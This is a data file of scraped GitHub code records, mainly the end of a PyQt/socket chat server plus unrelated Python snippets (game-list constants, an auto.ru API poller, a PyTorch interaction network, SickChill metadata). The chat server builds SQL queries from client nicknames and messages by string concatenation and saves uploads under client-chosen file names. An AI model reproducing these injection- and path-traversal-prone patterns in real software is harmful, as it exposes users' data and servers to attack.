currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.dateLB.setText(self.date)\r\n\t\t\tself.timeLB.setText(self.time)\r\n\r\n\tdef changeTrackingFlag(self):\r\n\t\tif self.trackingFlag == True:\r\n\t\t\tself.trackingFlag = False\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tself.reportTE.append(\"Tracking is off!\")\r\n\t\telse:\r\n\t\t\tself.trackingFlag = True\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tself.reportTE.append(\"Tracking is on!\")\r\n\r\n\tdef changeRecordingFlag(self):\r\n\t\tself.recordingFlag += 1\r\n\t\tif self.recordingFlag % 2 == 0:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.setTextColor(QColor(30, 255, 0))\r\n\t\t\tself.reportTE.append(self.time + \": Stop record!\")\r\n\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\tself.reportTE.append(\"Record saving in: \" + self.recordName)\r\n\t\t\tself.recordBT.setToolTip('Start tracking the conversation in chat room')\r\n\t\telse:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.setTextColor(QColor(30, 255, 0))\r\n\t\t\tself.reportTE.append(self.time + \": Start record!\")\r\n\t\t\tself.recordName = str(currentTime.strftime(\"%d-%m-%Y\")) + \"-\" + str(self.ip) + \"-\" + str(self.port) + \".txt\"\r\n\t\t\tself.recordBT.setToolTip('Stop tracking the conversation in chat room')\r\n\r\n\tdef IPTransform(self):\r\n\t\ts = \"\"\r\n\t\tfor i in range(len(self.ip)):\r\n\t\t\tif (self.ip[i] == \".\"):\r\n\t\t\t\ts += \"_\"\r\n\t\t\telse:\r\n\t\t\t\ts += self.ip[i]\r\n\t\treturn s\r\n\r\n\tdef getNickname_Message(self, msg):\r\n\t\tindex = 0\r\n\t\tfor i in range(len(msg)):\r\n\t\t\tif msg[i] == \":\":\r\n\t\t\t\tindex = i\r\n\t\t\t\tbreak\r\n\t\treturn msg[:index], msg[index + 1:len(msg)]\r\n\r\n\tdef getRowCount(self, cur):\r\n\t\tcount = 0\r\n\t\tfor row in enumerate(cur):\r\n\t\t\tcount += 1\r\n\t\treturn count\r\n\r\n\tdef getMessageCount(self):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tsql = \"SELECT MAX(no) FROM \" + self.messageTableName + \";\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcount = 0\r\n\t\tfor n, row in enumerate(cur):\r\n\t\t\tfor m, col in enumerate(row):\r\n\t\t\t\tcount = int(col)\r\n\t\tcon.close()\r\n\t\treturn count\r\n\r\n\tdef createData(self):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tip = self.IPTransform()\r\n\t\tsql = \"CREATE TABLE IF NOT EXISTS \" + self.clientTableName + \" (no INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, nickname TEXT);\"\r\n\t\tcur = con.cursor()\r\n\t\tcur.execute(sql)\r\n\t\tsql = \"CREATE TABLE IF NOT EXISTS \" + self.messageTableName + \" (no INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, datetime datetime, nickname TEXT, message TEXT);\"\r\n\t\tcur.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef addMessage(self, message):\r\n\t\tip = self.IPTransform()\r\n\t\tnickname, msg = self.getNickname_Message(message)\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tsql = \"INSERT INTO \" + self.messageTableName + \" (datetime, nickname, message) VALUES ('\" + self.date + \" \" + self.time + \"', '\" + nickname + \"', '\" + msg + \"');\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef addNickname(self, client, nickname):\r\n\t\tcon = sqlite3.connect(self.dataDIR)\r\n\t\tip = self.IPTransform()\r\n\t\tsql = \"SELECT nickname FROM \" + self.clientTableName + \" WHERE nickname = '\" + nickname + \"';\"\r\n\t\tcur = con.execute(sql)\r\n\t\tif self.getRowCount(cur) != 0:\r\n\t\t\tif (self.getMessageCount() > 10):\r\n\t\t\t\tsql = \"SELECT * FROM \" + self.messageTableName + \" WHERE no > \" + str(self.getMessageCount() - 10) + \";\"\r\n\t\t\telse:\r\n\t\t\t\tsql = \"SELECT * FROM \" + self.messageTableName + \";\"\r\n\t\t\tcur = con.execute(sql)\r\n\t\t\tclient.send(\"LOAD:Loading last chat!\".encode(\"utf-8\"))\r\n\t\t\ttime.sleep(1)\r\n\t\t\tfor n, row in enumerate(cur):\r\n\t\t\t\tdatetime = \"\"\r\n\t\t\t\tnkname = \"\"\r\n\t\t\t\tmessage = \"\"\r\n\t\t\t\tfor m, col in enumerate(row):\r\n\t\t\t\t\tif m == 1:\r\n\t\t\t\t\t\tdatetime = str(col)\r\n\t\t\t\t\tif m == 2:\r\n\t\t\t\t\t\tnkname = str(col)\r\n\t\t\t\t\tif m == 3:\r\n\t\t\t\t\t\tmessage = str(col)\r\n\t\t\t\tmsg = \"LOAD:\" + datetime + \": \" + nkname + \": \" + message\r\n\t\t\t\tclient.send(msg.encode(\"utf-8\"))\r\n\t\t\t\ttime.sleep(0.25)\r\n\t\telse:\r\n\t\t\tsql = \"INSERT INTO \" + self.clientTableName + \" (nickname) VALUES ('\" + nickname + \"');\"\r\n\t\tcur = con.execute(sql)\r\n\t\tcon.commit()\r\n\t\tcon.close()\r\n\r\n\tdef broadcast(self, message, typeMSG, client = None):\r\n\t\tif self.trackingFlag == True and typeMSG == 0:\r\n\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.append(self.time + \": \" + message.decode(\"utf-8\"))\r\n\r\n\t\tif self.recordingFlag != 0 and self.recordingFlag % 2 != 0 and typeMSG == 0:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tdate1 = currentTime.strftime(\"%d-%m-%Y\")\r\n\t\t\tfile = codecs.open(self.BASE_DIR + \"/Server/Records/\" + self.recordName, \"a\", \"utf-8\")\r\n\t\t\tfile.writelines(\"\\n\" + self.time + \": \" + message.decode(\"utf-8\"))\r\n\t\t\tfile.close()\r\n\t\tfor client1 in self.clients:\r\n\t\t\tif client1 != client:\r\n\t\t\t\tclient1.sendall(message)\r\n\r\n\tdef handle(self, client):\r\n\t\ttry:\r\n\t\t\twhile self.runnable == True:\r\n\t\t\t\tmessage = client.recv(4096)\r\n\t\t\t\tself.broadcast(message, 0, client)\r\n\t\t\t\tmsg = message.decode(\"utf-8\")\r\n\t\t\t\tself.addMessage(msg)\r\n\r\n\t\t\t\tif msg[:5] == \"FILE:\":\r\n\t\t\t\t\tself.fileName = msg[5:len(msg)]\r\n\t\t\t\t\tif (self.recordingFlag != 0 and self.recordingFlag % 2 != 0):\r\n\t\t\t\t\t\twith open(self.BASE_DIR + \"/Server/Recieves/\" + self.fileName, \"wb\") as file:\r\n\t\t\t\t\t\t\twhile True: \r\n\t\t\t\t\t\t\t\tfileData = client.recv(4096)\r\n\t\t\t\t\t\t\t\tfile.write(fileData)\r\n\t\t\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\t\t\tself.broadcast(fileData, 2, client)\r\n\t\t\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\t\tif len(fileData) < 4096:\r\n\t\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\twhile True: \r\n\t\t\t\t\t\t\tfileData = client.recv(4096)\r\n\t\t\t\t\t\t\tself.broadcast(fileData, 2, client)\r\n\t\t\t\t\t\t\tif len(fileData) < 4096:\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\texcept:\r\n\t\t\tindex = self.clients.index(client)\r\n\t\t\tself.clients.remove(client)\r\n\t\t\tclient.close()\r\n\t\t\tnickname = self.nicknames[index]\r\n\t\t\tself.broadcast('Nickname {} left!'.format(nickname).encode('utf-8'), 1)\r\n\t\t\tself.reportTE.setTextColor(QColor(255, 0, 0))\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\tself.reportTE.append(self.time + \": Nickname \"+ nickname +' left!')\r\n\t\t\tself.nicknames.remove(nickname)\r\n\tdef receive(self):\r\n\t\ttry:\r\n\t\t\twhile self.runnable == True:\r\n\t\t\t\tclient, address = server.accept()\r\n\t\t\t\tself.reportTE.setTextColor(QColor(0, 0, 0))\r\n\t\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\t\t\tself.reportTE.append(self.time + \": Connected with \" + str(address))\r\n\t\t\t\tclient.send('NICK'.encode('utf-8'))\r\n\t\t\t\tnickname = client.recv(1024).decode('utf-8')\r\n\t\t\t\tself.nicknames.append(nickname)\r\n\t\t\t\tself.clients.append(client)\r\n\t\t\t\tself.reportTE.append(\"Nickname is \" + str(nickname))\r\n\t\t\t\tthread1 = threading.Thread(target=self.addNickname, args=(client, nickname))\r\n\t\t\t\tthread1.start()\r\n\t\t\t\tself.broadcast(\"{} joined!\".format(nickname).encode('utf-8'), 1, client)\r\n\t\t\t\tclient.send('Connected to server!'.encode('utf-8'))\r\n\t\t\t\tthread2 = threading.Thread(target=self.handle, args=(client,))\r\n\t\t\t\tthread2.start()\r\n\t\texcept:\r\n\t\t\tself.reportTE.setTextColor(QColor(80, 0, 255))\r\n\t\t\tself.reportTE.append(self.time + \": \" + \"An error occured!\")\r\n\t\t\tserver.close()\r\n\r\n\tdef runServer(self):\r\n\t\tkillPort(self.port)\r\n\t\tserver.bind((self.ip, self.port))\r\n\t\tserver.listen()\r\n\t\tself.reportTE.setTextColor(QColor(30, 255, 0))\r\n\t\tcurrentTime = datetime.datetime.now()\r\n\t\tself.time = currentTime.strftime(\"%H:%M:%S\")\r\n\t\tself.reportTE.append(self.time + \": Server is running!\")\r\n\t\tself.reportTE.setTextColor(QColor(80, 0, 255))\r\n\t\tself.reportTE.append(\"Server IP: \" + self.ip)\r\n\t\tself.reportTE.append(\"Server Port: \" + str(self.port))\r\n\t\tself.runnable = True\r\n\t\tself.createData()\r\n\t\tself.receive()\r\n\r\n\tdef setupUi(self, ServerWD, ip, port):\r\n\t\tself.ip = ip\r\n\t\tself.port = port\r\n\r\n\t\tself.clients = []\r\n\t\tself.nicknames = []\r\n\r\n\t\tself.trackingFlag = False\r\n\t\tself.recordingFlag = 0\r\n\t\tself.runnable = False\r\n\r\n\r\n\t\tself.BASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n\t\tself.dataDIR = self.BASE_DIR + \"/Server/Data/data.db\"\r\n\t\tself.messageTableName = \"S\" + self.IPTransform() + \"_\" + str(self.port)\r\n\t\tself.clientTableName = \"S\" + self.IPTransform() + \"_\" + str(self.port) + \"_clients\"\r\n\r\n\t\tServerWD.setObjectName(\"ServerWD\")\r\n\t\tServerWD.resize(350, 450)\r\n\t\tServerWD.setMinimumSize(QtCore.QSize(350, 450))\r\n\t\tServerWD.setMaximumSize(QtCore.QSize(350, 450))\r\n\t\tself.centralwidget = QtWidgets.QWidget(ServerWD)\r\n\t\tself.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n\t\tself.dateLB = QtWidgets.QLabel(self.centralwidget)\r\n\t\tself.dateLB.setGeometry(QtCore.QRect(10, 10, 75, 13))\r\n\t\tself.dateLB.setStyleSheet(stylesheet)\r\n\t\tself.dateLB.setObjectName(\"dateLB\")\r\n\r\n\t\tself.timeLB = QtWidgets.QLabel(self.centralwidget)\r\n\t\tself.timeLB.setGeometry(QtCore.QRect(290, 10, 65, 13))\r\n\t\tself.timeLB.setStyleSheet(stylesheet)\r\n\t\tself.timeLB.setObjectName(\"timeLB\")\r\n\r\n\t\tself.reportTE = QtWidgets.QTextEdit(self.centralwidget)\r\n\t\tself.reportTE.setGeometry(QtCore.QRect(10, 30, 331, 357))\r\n\t\tself.reportTE.setReadOnly(True)\r\n\t\tself.reportTE.setObjectName(\"reportTE\")\r\n\r\n\t\tself.trackingBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.trackingBT.setGeometry(QtCore.QRect(10, 395, 35, 35))\r\n\t\tself.trackingBT.setStyleSheet(stylesheet)\r\n\t\tself.trackingBT.setObjectName(\"trackingBT\")\r\n\t\tself.trackingBT.setToolTip('Tracking the conversation in chat room')\r\n\r\n\t\tself.recordBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.recordBT.setGeometry(QtCore.QRect(305, 395, 35, 35))\r\n\t\tself.recordBT.setStyleSheet(stylesheet1)\r\n\t\tself.recordBT.setObjectName(\"recordBT\")\r\n\t\tself.recordBT.setToolTip('Start tracking the conversation in chat room')\r\n\r\n\t\tself.listBT = QtWidgets.QPushButton(self.centralwidget)\r\n\t\tself.listBT.setGeometry(QtCore.QRect(158, 395, 35, 35))\r\n\t\tself.listBT.setStyleSheet(stylesheet2)\r\n\t\tself.listBT.setObjectName(\"listBT\")\r\n\t\tself.listBT.setToolTip('Show all client in chat room')\r\n\r\n\t\tServerWD.setCentralWidget(self.centralwidget)\r\n\t\tself.statusbar = QtWidgets.QStatusBar(ServerWD)\r\n\t\tself.statusbar.setObjectName(\"statusbar\")\r\n\r\n\t\tServerWD.setStatusBar(self.statusbar)\r\n\r\n\t\t#Tự động\r\n\t\tself.datetimeThread = threading.Thread(target = self.setCurrentTime)\r\n\t\tself.datetimeThread.start()\r\n\t\tserverThread = threading.Thread(target = self.runServer)\r\n\t\tserverThread.start()\r\n\t\t#Chức năng\r\n\t\tself.trackingBT.clicked.connect(self.changeTrackingFlag)\r\n\t\tself.recordBT.clicked.connect(self.changeRecordingFlag)\r\n\t\tself.listBT.clicked.connect(self.showClientList)\r\n\r\n\t\tself.retranslateUi(ServerWD)\r\n\t\tQtCore.QMetaObject.connectSlotsByName(ServerWD)\r\n\r\n\tdef retranslateUi(self, ServerWD):\r\n\t\t_translate = QtCore.QCoreApplication.translate\r\n\t\tServerWD.setWindowTitle(_translate(\"ServerWD\", \"Cloud Chat - Server\"))\r\n\t\tself.dateLB.setText(_translate(\"ServerWD\", \"TextLabel\"))\r\n\t\tself.timeLB.setText(_translate(\"ServerWD\", \"TextLabel\"))\r\n\r\nstylesheet = \"\"\"\r\n\tQLabel {\r\n\t\tfont: bold 10px;\r\n\t\tcolor: #ffffff;\r\n\t}\r\n\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/eye.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nstylesheet1 = \"\"\"\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/record.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nstylesheet2 = \"\"\"\r\n\tQPushButton {\r\n\t\tbackground-image: url(Images/list.png);\r\n\t\tbackground-repeat: no-repeat;\r\n\t\tbackground-position: center;\r\n\t}\r\n\"\"\"\r\n\r\nclass ServerWindow(QtWidgets.QMainWindow):\r\n\tdef closeEvent(self, event):\r\n\t\tstate = False\r\n\t\tserver.close()\r\n\t\tevent.accept()\r\n\r\nif __name__ == \"__main__\":\r\n\timport sys\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\tServerWD = ServerWindow()\r\n\tui = Ui_ServerWD()\r\n\tui.setupUi(ServerWD, \"127.0.0.1\", 55555)\r\n\tServerWD.show()\r\n\tsys.exit(app.exec_())\r\n\r\n","repo_name":"windminer1310/CloudChat","sub_path":"CloudChat/ServerWD.py","file_name":"ServerWD.py","file_ext":"py","file_size_in_byte":13244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36103488870","text":"from src.parsers.heresy import heresy\nfrom src.parsers.killteam import killteam\nfrom src.parsers.w40k import w40k\n\nKILLTEAM_ID: str = \"3b7e-7dab-f79f-2e74\"\n\nHORUS_HERESY_ID: str = \"28d4-bd2e-4858-ece6\"\n\nWARHAMMER_40K_ID: str = \"28ec-711c-d87f-3aeb\"\n\nSUPPORTED_PARSERS = {KILLTEAM_ID: killteam, HORUS_HERESY_ID: heresy, WARHAMMER_40K_ID: w40k}\nTEMPLATES = {KILLTEAM_ID: \"killteam.html\", HORUS_HERESY_ID: \"heresy.html\", WARHAMMER_40K_ID: \"w40k.html\"}\n\nWARHAMMER_40K_NAME: str = \"\"\n\nAGE_OF_SIGMAR_ID: str = \"\"\nAGE_OF_SIGMAR_NAME: str = \"\"\n\nSUPPORTED_BATTLESCRIBE_VERSION = \"2.03\"\n\nBATTLESCRIBE_VERSION_ERROR = {\n \"ERROR\": \"battlesrcibe version not supported please upgrade, the current supported version is {}\".format(\n SUPPORTED_BATTLESCRIBE_VERSION\n )\n}\n","repo_name":"stvnksslr/dataslate-parser","sub_path":"src/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"34694076824","text":"import datetime\nimport json\nfrom dotenv import load_dotenv\nimport os\nimport requests\nimport time\nimport bucket\n\n\nload_dotenv()\ntoken = os.getenv('MANAGER_TOKEN')\nURL = 'https://apiauto.ru/1.0/comeback'\ndate_today = datetime.datetime.now()\nt1 = datetime.datetime.today().strftime('%Y-%m-%d')\nt2 = f'{t1} 00:01:00.000'\nperiod = int((datetime.datetime.strptime(t2, '%Y-%m-%d %H:%M:%S.%f')).timestamp() * 1000)\n\nh = date_today.hour\nday = 3\nday_milli = day * 86400000\nlast_23h = int(time.time()*1000 - day_milli)# - 5184000000)#89600000)\nlast_hour = int(time.time()*1000 - 3600000)\nr = time.ctime(last_hour)\n\n\ndef choose_time(name: str) -> float:\n if name != 'Profi':\n return last_23h\n else:\n return period\n\n\ndef record_offers(id: str) -> bool:\n \"\"\"сверяем айди офферов с данными в bucket\"\"\"\n obj = bucket.get_object(bucket.auth())\n search_date = obj.get(t1, None)\n if search_date is not None:\n if id not in search_date:\n search_date.append(id)\n bucket.load_object(bucket.auth(), obj)\n return True\n else:\n obj[t1] = []\n bucket.load_object(bucket.auth(), obj)\n return False\n\n\ndef sale_back(dealer_id: int, name: str, session_id: str) -> str or None:\n start_from = choose_time(name)\n headers = {\n 'X-Session-Id': session_id,\n 'X-Authorization': token,\n 'Accept': 'application/json',\n 'x-dealer-id': dealer_id,\n }\n data = {\n \"pagination\": {\n \"page\": 1,\n \"page_size\": 10\n },\n \"filter\": {\n \"creation_date_from\": start_from,\n },\n \"only_last_seller\": False,\n\n }\n r = requests.post(URL, json=data, headers=headers).json()\n print(r)\n text = ''\n try:\n for value in r['comebacks']:\n status = value['offer']['status']\n created = value['offer']['created']\n print(created)\n date = str(created).split('T')[0]\n if status == 'ACTIVE':\n mark = value['offer']['car_info']['mark']\n model = value['offer']['car_info']['model']\n url = value['offer']['mobile_url']\n offer_id = value['offer']['id']\n new_offer = record_offers(offer_id)\n if new_offer is True:\n text += f'{name} {mark} {model}\\n{url}\\n'\n else:\n pass\n if len(text) > 0:\n print(text)\n return text\n else:\n return None\n except:\n pass\n","repo_name":"MaratBo/chat_bot_v2","sub_path":"sale_back.py","file_name":"sale_back.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34516103664","text":"import sys\n\narr = list(map(int,sys.stdin.readline().rstrip()))\n\nfront = 0\nback = 0\n\nfor i in arr[0:len(arr)//2]:\n front += i\n\nfor i in arr[len(arr)//2:]:\n back += i\n\nif front == back:\n print(\"LUCKY\")\nelse:\n print(\"READY\")","repo_name":"asdf28/Daily-Algorithm","sub_path":"PythonStudy/TICT/Q7_LuckStraight.py","file_name":"Q7_LuckStraight.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70511042669","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom MLPs import *\nfrom util import *\nimport copy\n\nclass RelationModel(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(RelationModel, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, output_size),\n nn.ReLU()\n )\n\n def forward(self, x):\n '''\n Args:\n x: [n_relations, input_size]\n Returns:\n [n_relations, output_size]\n '''\n return self.model(x)\n\n\nclass ObjectModel(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(ObjectModel, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(input_size, hidden_size),\n nn.ReLU(),\n nn.Linear(hidden_size, output_size)\n )\n\n def forward(self, x):\n '''\n Args:\n x: [n_objects, input_size]\n Returns:\n [n_objects, output_size]\n\n Note: output_size = number of states we want to predict\n '''\n return self.model(x)\n\nclass InteractionNetwork(BasicModel):\n def __init__(self, args, x_dim=0):\n super(InteractionNetwork, self).__init__(args, 'InteractionNetwork')\n \n self.device = args.device\n self.bs = args.batch_size\n self.n_objects = args.n_objects\n self.n_relations = self.n_objects * (self.n_objects - 1)\n self.obj_dim = args.node_feature_size\n\n self.rel_dim = args.edge_feature_size\n answer_size = args.answer_size\n self.eff_dim, hidden_rel_dim, hidden_obj_dim = args.hidden_dim, args.hidden_dim, args.hidden_dim\n self.rm = RelationModel(self.obj_dim * 2 + self.rel_dim, hidden_rel_dim, self.eff_dim)\n self.om = ObjectModel(self.obj_dim + self.eff_dim + x_dim, hidden_obj_dim, answer_size) # x, y\n \n receiver_r = np.zeros((self.n_objects, self.n_relations), dtype=float)\n sender_r = np.zeros((self.n_objects, self.n_relations), dtype=float)\n\n count = 0 # used as idx of relations\n for i in range(self.n_objects):\n for j in range(self.n_objects):\n if i != j:\n receiver_r[i, count] = 1.0\n sender_r[j, count] = 1.0\n count += 1\n\n self.rs = Variable(torch.FloatTensor(sender_r)).to(self.device)\n self.rr = Variable(torch.FloatTensor(receiver_r)).to(self.device)\n #self.ra = Variable(torch.FloatTensor(r_info)).to(self.device)\n \n if args.optimizer == 'Adam':\n self.optimizer = optim.Adam(self.parameters(), lr=args.lr, weight_decay=args.decay)\n else:\n self.optimizer = optim.SGD(self.parameters(), lr=args.lr, weight_decay=args.decay)\n\n def norm(self, a, b):\n return torch.norm(a - b, 2)\n\n def m(self, obj, bs):\n \"\"\"\n The marshalling function;\n computes the matrix products ORr and ORs and concatenates them with Ra\n\n :param obj: object states\n :param rr: receiver relations\n :param rs: sender relations\n :param ra: relation info\n :return:\n \"\"\"\n r_info = np.zeros((bs, self.rel_dim, self.n_relations))\n ra = Variable(torch.FloatTensor(r_info)).to(self.device)\n for b in range(bs):\n count = 0\n for i in range(self.n_objects):\n for j in range(self.n_objects):\n if i != j:\n s_mass = obj[b, j, 0]\n s_pos = obj[b, j, 1:3]\n r_pos = obj[b, i, 1:3]\n ra[b, :, count] = s_mass* (s_pos - r_pos)/ self.norm(s_pos, r_pos)**3\n count += 1\n\n obj_t = torch.transpose(obj, 1, 2).reshape(-1, self.n_objects) # (bs * obj_dim, n_objects)\n orr = obj_t.mm(self.rr).reshape((bs, self.obj_dim, -1)) # (bs, obj_dim, n_relations)\n ors = obj_t.mm(self.rs).reshape((bs, self.obj_dim, -1)) # (bs, obj_dim, n_relations)\n\n return torch.cat([orr, ors, ra], dim = 1) # (bs, obj_dim*2+rel_dim, n_relations)\n\n def forward(self, obj, bs, x=None):\n \"\"\"\n objects, sender_relations, receiver_relations, relation_info\n :param obj: (bs, n_objects, obj_dim)\n :param rr: (n_objects, n_relations)\n :param rs: (n_objects, n_relations)\n :param x: external forces, default to None\n :return:\n \"\"\"\n # marshalling function\n b = self.m(obj, bs) # shape of b = (bs, obj_dim*2+rel_dim, n_relations)\n # relation module\n e = self.rm(torch.transpose(b, 1, 2)) # shape of e = (bs, n_relations, eff_dim)\n e = torch.transpose(e, 1, 2).reshape(-1, self.n_relations) # shape of e = (bs * eff_dim, n_relations)\n # effect aggregator\n if x is None:\n # shape of a = (bs, obj_dim+eff_dim, n_objects)\n a = torch.cat([torch.transpose(obj, 1, 2), e.mm(self.rr.t()).reshape((bs, self.eff_dim, -1))], dim = 1) \n else:\n # [unchanged] shape of a = (obj_dim+ext_dim+eff_dim, n_objects) \n a = torch.cat([torch.transpose(obj, 1, 2), x, e.mm(self.rr.t())]) \n # object module\n p = self.om(torch.transpose(a, 1, 2)) # shape of p = (bs, n_objects, answer_size)\n\n return p","repo_name":"liqing-ustc/CS249-GNN-Final","sub_path":"n_body/in_network.py","file_name":"in_network.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25092872330","text":"import ee\r\nimport mercury as mr\r\n\r\ndef customds_initialization(m, date_one, date_two, custom_ds):\r\n ds = ee.ImageCollection(custom_ds.value).filterDate(str(date_one.value), str(date_two.value))\r\n custom_bands = mr.MultiSelect(label=\"[Custom DS] Select dataset bands\",\r\n value=[],\r\n choices=['SR_B1', 'SR_B2', 'SR_B3', 'SR_B4', 'SR_B5', 'SR_B6', 'SR_B7', 'B1', 'B2', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'B10', 'B11'])\r\n\r\n ds_custom = ds.select(custom_bands.value)\r\n vis_custom = {'bands': custom_bands.value}\r\n\r\n m.addLayer(ds_custom, vis_custom, \"Custom GEE dataset\")\r\n","repo_name":"olgerdflorian/gaia","sub_path":"gee/modules/customds_init.py","file_name":"customds_init.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13089842168","text":"import os\nimport re\nfrom typing import Union\nfrom xml.etree import ElementTree\n\nimport fanart\nimport tmdbsimple\nfrom fanart.core import Request as fanartRequest\n\nimport sickchill\nfrom sickchill import logger, settings\nfrom sickchill.helper.common import remove_extension, replace_extension, try_int\nfrom sickchill.oldbeard import helpers\n\nfrom . import helpers as metadata_helpers\n\n\nclass GenericMetadata(object):\n \"\"\"\n Base class for all metadata providers. Default behavior is meant to mostly\n follow KODI 12+ metadata standards. Has support for:\n - show metadata file\n - episode metadata file\n - episode thumbnail\n - show fanart\n - show poster\n - show banner\n - season thumbnails (poster)\n - season thumbnails (banner)\n - season all poster\n - season all banner\n \"\"\"\n\n def __init__(\n self,\n show_metadata=False,\n episode_metadata=False,\n fanart=False,\n poster=False,\n banner=False,\n episode_thumbnails=False,\n season_posters=False,\n season_banners=False,\n season_all_poster=False,\n season_all_banner=False,\n ):\n self.name = \"Generic\"\n\n self._ep_nfo_extension = \"nfo\"\n self._show_metadata_filename = \"tvshow.nfo\"\n\n self.fanart_name = \"fanart.jpg\"\n self.poster_name = \"poster.jpg\"\n self.banner_name = \"banner.jpg\"\n\n self.season_all_poster_name = \"season-all-poster.jpg\"\n self.season_all_banner_name = \"season-all-banner.jpg\"\n\n self.show_metadata = show_metadata\n self.episode_metadata = episode_metadata\n self.fanart = fanart\n self.poster = poster\n self.banner = banner\n self.episode_thumbnails = episode_thumbnails\n self.season_posters = season_posters\n self.season_banners = season_banners\n self.season_all_poster = season_all_poster\n self.season_all_banner = season_all_banner\n\n def get_config(self):\n config_list = [\n self.show_metadata,\n self.episode_metadata,\n self.fanart,\n self.poster,\n self.banner,\n self.episode_thumbnails,\n self.season_posters,\n self.season_banners,\n self.season_all_poster,\n self.season_all_banner,\n ]\n return \"|\".join([str(int(x)) for x in config_list])\n\n def get_id(self):\n return GenericMetadata.makeID(self.name)\n\n @staticmethod\n def makeID(name):\n name_id = re.sub(r\"[+]\", \"plus\", name)\n name_id = re.sub(r\"[^\\w\\d_]\", \"_\", name_id).lower()\n return name_id\n\n def set_config(self, config_string):\n config_list = [bool(int(x)) for x in config_string.split(\"|\")]\n self.show_metadata = config_list[0]\n self.episode_metadata = config_list[1]\n self.fanart = config_list[2]\n self.poster = config_list[3]\n self.banner = config_list[4]\n self.episode_thumbnails = config_list[5]\n self.season_posters = config_list[6]\n self.season_banners = config_list[7]\n self.season_all_poster = config_list[8]\n self.season_all_banner = config_list[9]\n\n @staticmethod\n def _check_exists(location):\n if location:\n result = os.path.isfile(location)\n logger.debug(f\"Checking if {location} exists: {result}\")\n return result\n return False\n\n def _has_show_metadata(self, show_obj):\n return self._check_exists(self.get_show_file_path(show_obj))\n\n def _has_episode_metadata(self, ep_obj):\n return self._check_exists(self.get_episode_file_path(ep_obj))\n\n def _has_fanart(self, show_obj):\n return self._check_exists(self.get_fanart_path(show_obj))\n\n def _has_poster(self, show_obj):\n return self._check_exists(self.get_poster_path(show_obj))\n\n def _has_banner(self, show_obj):\n return self._check_exists(self.get_banner_path(show_obj))\n\n def _has_episode_thumb(self, ep_obj):\n return self._check_exists(self.get_episode_thumb_path(ep_obj))\n\n def _has_season_poster(self, show_obj, season):\n return self._check_exists(self.get_season_poster_path(show_obj, season))\n\n def _has_season_banner(self, show_obj, season):\n return 